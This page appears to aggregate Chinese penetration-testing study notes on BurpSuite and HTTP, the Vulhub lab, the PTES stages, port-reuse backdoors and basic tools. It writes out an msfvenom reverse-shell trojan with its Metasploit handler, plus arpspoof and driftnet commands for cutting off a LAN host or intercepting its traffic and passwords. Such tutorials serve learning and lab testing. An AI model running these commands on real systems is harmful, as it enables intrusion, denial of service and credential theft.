渗透测试

【渗透测试小白系列】之简单使用BurpSuite

半城伤御伤魂 提交于 2019-11-30 05:53:33
(本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦) 一、HTTP协议基础 HTTP: HyperText Transfer Protocol,超文本传输协议 1.协议特点: 简单快速,请求方式get post head等8中请求方式 无连接(一次请求就断开)无状态(没有记忆功能,不会记录任何信息) 2.支持的模式: B/S、C/S(websocket进行通信) 3.请求包格式: request=请求行+请求头+空行+请求数据 4.请求方式: http1.0版本: GET POST HEAD http1.1版本: GET POST HEAD OPTIONS DELETE TRACE CONNECT PUT PATCH 方法 描述 GET 请求指定的页面信息,并返回实体主体 POST 向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。 数据被包含在请求体中。POST 请求可能会导致新的资源的建立和或已有资源的修改 HEAD 类似于 GET 请求,只不过返回的响应中没有具体的内容,用于获取报头 OPTIONS 允许客户端查看服务器的性能 DELETE 请求服务器删除指定的页面 TRACE 回显服务器收到的请求,主要用于测试或诊断 CONNECT HTTP/1.1 协议中预留给能够将连接改为管道方式的代理服务器 PUT

2019-9-20:渗透测试,基础学习,笔记,metasploit的基础使用

倾然丶 夕夏残阳落幕 提交于 2019-11-30 04:28:34
使用kali下metasploit生成木马,控制windows系统 kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack) Metasploit,是综合利用工具,使用Ruby开发,使用方便 msfconsole 进入工具 MSF,依赖postgresql数据库,在使用MSF前要开启数据库 msfvenom :生成木马 msfvenon -p windows/meterpreter/reverse_tcp lhost=kali ip地址 lport=5555 -f exe > /root/desktop/muma.exe -p,后边跟着payload,攻击成功之后要做什么事情 lhost,后跟监听的ip lport,后跟监听端口 -f,表示要生产后门文件的类型 >,重定向到一个路径 将生成文件发送到靶子机 开启 msfconsole ,开启前打开数据库 postgresql exploits,开发利用,攻击某些服务,平台,系统等用到的工具, use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options,查看需要设置哪些参数 set lhost 192.168.20.135 run / exploit,启动监听

渗透测试环境搭建--Vulhub

允我心安 提交于 2019-11-29 22:36:57
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 Docker安装(Ubuntu 16.04) # Install pip curl -s https://bootstrap.pypa.io/get-pip.py | python3 # Install the latest version docker curl -s https://get.docker.com/ | sh # Run docker service service docker start # Install docker compose pip install docker-compose 环境部署 首先下载项目: wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip unzip vulhub-master.zip 进入需要部署的系统环境: cd vulhub-master/weblogic/CVE-2018-2628 下载启动环境 docker-compose build docker-compose up -d 查看启动的虚拟机: 进入该虚拟服务器进行管理

PTEST 渗透测试标准

ε祈祈猫儿з 提交于 2019-11-29 00:18:10
1:前期交互阶段 在前期交互(Pre-Engagement Interaction)阶段,渗透测试团队与客户组织进行交互讨论,最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。该阶段通常涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动。 2:情报收集阶段 在目标范围确定之后,将进入情报搜集(Information Gathering)阶段,渗透测试团队可以利用各种信息来源与搜集技术方法,尝试获取更多关于目标组织网络拓扑、系统配置与安全防御措施的信息。 渗透测试者可以使用的情报搜集方法包括公开来源信息查询、Google Hacking、社会工程学、网络踩点、扫描探测、被动监听、服务查点等。而对目标系统的情报探查能力是渗透测试者一项非常重要的技能,情报搜集是否充分在很大程度上决定了渗透测试的成败,因为如果你遗漏关键的情报信息,你将可能在后面的阶段里一无所获。 3:威胁建模阶段 在搜集到充分的情报信息之后,渗透测试团队的成员们停下敲击键盘,大家聚到一起针对获取的信息进行威胁建模(Threat Modeling)与攻击规划。这是渗透测试过程中非常重要,但很容易被忽视的一个关键点。通过团队共同的缜密情报分析与攻击思路头脑风暴,可以从大量的信息情报中理清头绪,确定出最可行的攻击通道。 4:漏洞分析阶段 在确定出最可行的攻击通道之后

渗透测试-端口复用正向后门

怎甘沉沦 提交于 2019-11-28 21:28:05
补充一下端口复用的知识 0x01 关于端口复用 端口复用也是很老的后门技术,主要是劫持 web服务器相关进程/服务的内存空间、系统API甚至劫持网络驱动 去达到目的, 在winsocket的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分。这种多重绑定便称之为端口复用。 这里总结的是基于web服务组合HTTP.sys驱动进行端口服用后门维权。 0x02 Net.TCP Port Sharing 参考:https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/configuring-the-net-tcp-port-sharing-service https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/net-tcp-port-sharing 简单来说,刚引入TCP/IP协议的时候,TCP/IP 通过为每一个应用程序协议分配一个唯一的 16 位端口号,从而 使用端口号来区分应用程序 。 部署使用非标准端口的应用程序经常会因为存在公司防火墙和个人防火墙而变得复杂或者甚至无法实现。 现在使用微软提供的NET.TCP Port Sharing服务

一次完整的渗透测试流程

泪湿孤枕 提交于 2019-11-28 18:48:46
目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束,不懂的移步——> 网络安全法 渗透测试分为 白盒测试 和 黑盒测试 白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析 黑盒测试就是只告诉我们这个网站的url,其他什么都不告诉,然后让你去渗透,模拟黑客对网站的渗透 我们现在就模拟黑客对一个网站进行渗透测试,这属于黑盒测试,我们只知道该网站的URL,其他什么的信息都不知道。 接下来,我就给大家分享下黑盒渗透测试的流程和思路! 当我们确定好了一个目标进行渗透之后,第一步该做的是什么呢? 信息收集 第一步做的就是信息收集,正所谓知己知彼百战百胜,我们根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息

Web渗透测试

雨燕双飞 提交于 2019-11-28 18:44:34
Web渗透测试概述 安全组织达成共识的通用说法是: 渗透测试是通过模拟恶意黑客的攻击方式,来评估计算机网络系统安全的一种评估方法。 Web渗透测试——只是针对于Web应用的渗透测试 Sql注入是典型的输入不充分例子。 目录穿越:直接穿越到系统文件,直接输入到客户端,泄露配置文件。 建议输入和输出都进行过滤。 黑客攻击思路: Web渗透测试像是体检,只是做前两步,发现漏洞后和研发部门解决问题 来源: CSDN 作者: 山鬼谣弋痕夕 链接: https://blog.csdn.net/weixin_30363263/article/details/83585144

Web 渗透测试入坑必备指南

半腔热情 提交于 2019-11-28 18:43:28
本场 Chat 我会详细介绍 web 安全的入坑指南以及必备技能的学习和一些实际思路。面向基础群众,以下内容微有技术门槛。想做一个帅气的黑客请预订,企业安全自检也请预订。 小白如何快速入门(基本介绍初学知识) 常见 web 渗透测试工具使用(Nmap、Burpsuite、AppScan、WVS、Safe3、SQLmap)(比如: Nmap 端口扫描、Burpsuite 抓包改包爆破等模块功能、Appscan 的扫描、WVS 的扫描、Safe3 的扫描、SQLmap 的使用) OWASP Top 10 风险 白帽子的测试是否合法,边界在哪里? 个人书单推荐 我挖到了洞该怎么办? 练手靶机(真实环境和本地环境搭建) 内容可能会和实际情况有所出入。 实录提要: 怎么能够融入这个圈子? 还有没有其他比较好用的安全测试工具推荐? 安全测试类工具扫描不到是否意味着不具有漏洞? 看书和教程视频一直有个问题,就是怎么把讲的漏洞复现? 有可以避免 Web 安全漏洞问题的 Checklist 推荐吗? 肉鸡的话有什么途径可以搞到或者怎么流通? 需要怎样的技能才可以脱离安全工具,具备独立进行专业的安全工作的能力? 7.5IIS 有什么 0day 吗? 什么都不懂的小白想从事这种工作,怎么进行学习,从哪个方面? 单纯 Web 漏洞提权或者渗透,成功率并不高,偶然性太多,如何看待成功率的问题? 阅读全文:

渗透测试3---web渗透测试流程

谁说胖子不能爱 提交于 2019-11-28 18:42:53
web渗透测试流程: 为什么需要渗透测试工具? 1.节省时间和精力 2.更准确的结果 3.先进的分析方法 4.收集更多信息 5.自动化 常见的渗透测试工具? Wireshark sqlmap NMAP(扫描工具) metasploit:简称MSF,是一个攻击平台 Nessus:扫描工具;AWVS更好一点,是一个web界面。主要了解 渗透测试流程详细讲述(七大流程) 1.前期交互 2.情报收集 3.威胁建模 4.漏洞分析 5.渗透攻击 6.后渗透攻击 7.形成报告 威胁建模 :头脑风暴 搜索引擎 :google,baidu,bing(微软),duckduckgo(要科学上网) explo 来源: CSDN 作者: 一手代码,一手诗 链接: https://blog.csdn.net/qq_37615098/article/details/102735210

渗透测试之基本工具

百般思念 提交于 2019-11-28 12:51:17
一、局域网断网 1、arp攻击----让目标主机断网 工具:arpspoof 命令格式:arpspoof -i 本机网卡 -t 目标ip 网关 Ctrl+c 终止攻击 查看局域网内在使用的ip fping -asg 192.168.1.0/24 2、arp欺骗-----在获取目标流量的时候不会出现断网现象 让目ip流量经过我的本地网卡,从我的网关出去,不会出现断网现象 echo 1 >/proc/sys/net/ipv4/ip_forward -------让目标流量从我的本地网关出去 (该命令没有回显内容) arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 -----让目标流量经过的网卡 driftnet ----获取本机网卡上的图片流量,通过arp欺骗即可获取目标主机浏览的图片 echo 1 >/proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward---回显为“1”表示echo 1 >/proc/sys/net/ipv4/ip_forward执行成功 arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 driftnet -i eth0 -------------会弹出一个对话框,显示图片 3、获取HTTP账号密码 echo 1 >